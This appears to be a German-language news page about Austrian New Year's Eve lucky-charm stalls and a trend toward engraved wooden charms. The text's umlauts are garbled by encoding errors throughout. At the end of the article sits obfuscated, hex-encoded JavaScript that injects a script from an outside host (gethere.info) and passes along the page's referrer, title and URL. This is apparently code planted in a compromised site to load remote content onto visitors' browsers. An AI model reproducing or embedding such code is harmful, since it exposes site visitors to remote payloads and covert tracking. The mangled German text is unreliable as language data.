Friday, November 16, 2018

                News Feed

Neuer Trend zu personalisierten GlA?cksbringern aus Holz

Dezember 30, 2016 by  
Filed under Höhepunkte

Wenige Tage vor Silvester schieAYen sie wieder wie die sprichwAi??rtlichen Schwammerln aus dem Boden: die Silvesterstandln mit ihrem vielfAi??ltigen Angebot an GlA?cksbringern. Rund die HAi??lfte aller Ai??sterreicher wird sich bis zur Jahreswende mit den beliebten Figuren eindecken, um sie in der Silvesternacht an Verwandte, Freunde und Bekannte zu verschenken. Diese kleinen Aufmerksamkeiten sind eine Besonderheit des Ai??sterreichischen Brauchtums und in anderen LAi??ndern eher unbekannt.

Die Bandbreite variiert wie in den vergangenen Jahren von BewAi??hrtem wie vierblAi??ttrigen KleeblAi??ttern, MarienkAi??fern, Rauchfangkehrern, Hufeisen, GlA?ckspilzen oder Schweinchen bis hin zu Ausgefallenem wie Elefanten, Fischen, Pinguinen oder Delfinen.

Besonders beliebt sind vor allem kleine Plastik-GlA?cksbringer oder TalismAi??nner fA?r das GeldbAi??rsel. Nach wie vor gern gekauft werden aber auch Sparschweine, PlA?schtiere oder Keramik-Figuren. ai??zEin neuer Trend sind GlA?cksbringer aus Holz, die durch Gravur personalisiert werdenai???, weiAY Gerhard LackstAi??tter, Obmann des Bundesgremiums des Markt-, StraAYen- und Wanderhandels in der Wirtschaftskammer Ai??sterreich (WKAi??). Glastiere mit LED-Beleuchtung oder blinkende Sterne, Hufeisen, Herzen, die fA?r einige Jahre besonders beliebt waren, sieht man hingegen seltener.

Ein Klassiker darf auch zu diesem Jahreswechsel bei vielen Ai??sterreichern nicht fehlen: Kleine GlA?cksbringer in Form von KleeblAi??ttern, Pilzen oder Hufeisen aus Blei- oder Zinn, die A?ber einer Flamme geschmolzen und in Wasser gegossen werden. Die meisten der in Ai??sterreich verwendeten Silvestergussartikel kommen aus dem Traditionsunternehmen Erwin Perzy aus Wien-Hernals, welches auch Erfinder der Schneekugel ist.

ai??zWir schAi??tzen, dass heuer wieder rund 10 Millionen GlA?cksbringer die Menschen zu Silvester erfreuen werdenai???, meint Gerhard LackstAi??tter. Ob allerdings auch nAi??chstes Jahr die gleiche Anzahl der SilvesterstAi??nde mit ihrem groAYen Angebot noch fA?r nahezu uneingeschrAi??nktes KaufvergnA?gen sorgen wird, lAi??sst der Obmann des Ai??sterreichischen Markthandels offen. Angesichts der Belastungen, welche die neue Registrierkassenpflicht fA?r den Markthandel bringt, A?berlegen viele Marktfahrer, ob sie einen Silvesterstand weiterhin noch betriebswirtschaftlich rentabel betreiben kAi??nnen. \x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Comments are closed.